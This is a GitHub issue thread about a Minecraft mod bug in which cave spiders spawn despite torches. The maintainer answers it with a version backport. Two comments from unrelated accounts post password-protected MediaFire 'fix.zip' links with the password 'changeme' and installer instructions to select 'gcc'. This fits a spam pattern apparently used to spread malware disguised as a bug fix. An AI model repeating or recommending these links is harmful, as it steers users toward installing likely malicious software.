### ISSUE TITLE
Cave spiders spawn in caves, even when theres torches - is this supposed to be happening?

### ISSUE THREAD

**Issue by AwertaDreams** [sf-inc/sihywtcamd#60]
As in title, cave spiders spawn in caves, when theres torches. I would like to know, if this is supposed to be happening?

**Comment by charlyb01** [comment]
Hi, what version are you playing with? This was fixed since 1.10.3 😉

**Comment by AwertaDreams** [comment]
Im playing on 1.20.1, the mod version is 1.10.1+1.20.1.

**Comment by charlyb01** [comment]
Alright, I don't think I will keep maintaining this Minecraft version but I'll see if I can backport the changes this time. Keep you in touch

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AwertaDreams** [comment]
> Alright, I don't think I will keep maintaining this Minecraft version but I'll see if I can backport the changes this time. Keep you in touch

Thank you

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by charlyb01** [comment]
Hi, this is fixed in the new backport version for 1.20.1 😉  
Note however that this will be the last version for 1.20.1. It does not include every new features from latest version, as it would have required too much rework. You can still enjoy a few fixes and tweaks

**Comment by AwertaDreams** [comment]
Thank you!
